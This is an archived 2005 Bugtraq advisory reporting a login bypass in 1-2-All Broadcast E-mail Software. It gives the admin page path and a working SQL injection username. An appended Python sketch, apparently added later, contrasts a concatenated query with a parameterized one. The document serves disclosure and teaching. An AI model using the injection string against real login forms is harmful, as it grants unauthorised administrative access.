1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

bhs_team_at_yahoo.com
Date: 11/11/05

  • Next message: s2b_at_hotmail.com: "Cyphor (Release: 0.19) Sql injection"
    Date: 11 Nov 2005 19:52:41 -0000
    To: bugtraq@securityfocus.com
    
    
    1-2-All Broadcast E-mail Software ( POC )
    Supplying the following is sufficient to gain access to the admin control panel:

    Target :

    http://www.example.com/[12allTarget]/admin/index.php

    Username: ' or 1=1 /*
    Password: (Nothing)(Blank)

    Report By : POPO
    >From>IRAN> www.Babol-Hackers.com
    bhs_team@yahoo.com
    Y! ID : bhs_team , pooya_0nline
    -----------------------------------
    BHS-Team

    We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
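
The advisory does not show the query behind admin/index.php. As an added example (not code from the advisory or from 1-2-All), the sketch below assumes the login check concatenates the username into the SQL text. It shows why the posted username matches a row with a blank password and why a parameterized query rejects it. The table, column and function names are hypothetical, and SQLite stands in for the product's database.

```python
import hashlib
import sqlite3

# Username string quoted in the advisory above.
REPORTED_USERNAME = "' or 1=1 /*"


def _h(password):
    # Plain SHA-256 keeps the demo short; production code should use a password KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Build an in-memory admin table holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)", ("admin", _h("S3cret!")))
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: input is pasted into the SQL text."""
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND pw_hash = '" + _h(password) + "'")
    # With the reported username the statement becomes
    #   ... WHERE username = '' or 1=1 /*' AND pw_hash = '...'
    # The quote closes the literal, "or 1=1" is always true, and the
    # unterminated comment swallows the password comparison.
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Hardened pattern: values are bound as data, never parsed as SQL."""
    sql = "SELECT username FROM admins WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (username, _h(password))).fetchone() is not None


def compare_logins():
    """Return (concatenated, parameterized) results for each login attempt."""
    db = make_db()
    attempts = {
        "valid": ("admin", "S3cret!"),
        "wrong_password": ("admin", "guess"),
        "reported_input": (REPORTED_USERNAME, ""),
    }
    return {name: (login_concatenated(db, u, p), login_parameterized(db, u, p))
            for name, (u, p) in attempts.items()}


if __name__ == "__main__":
    for name, result in compare_logins().items():
        print(name, result)
```

Only the `reported_input` row differs between the two functions, which makes it a useful regression test once the login query is converted to bound parameters.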

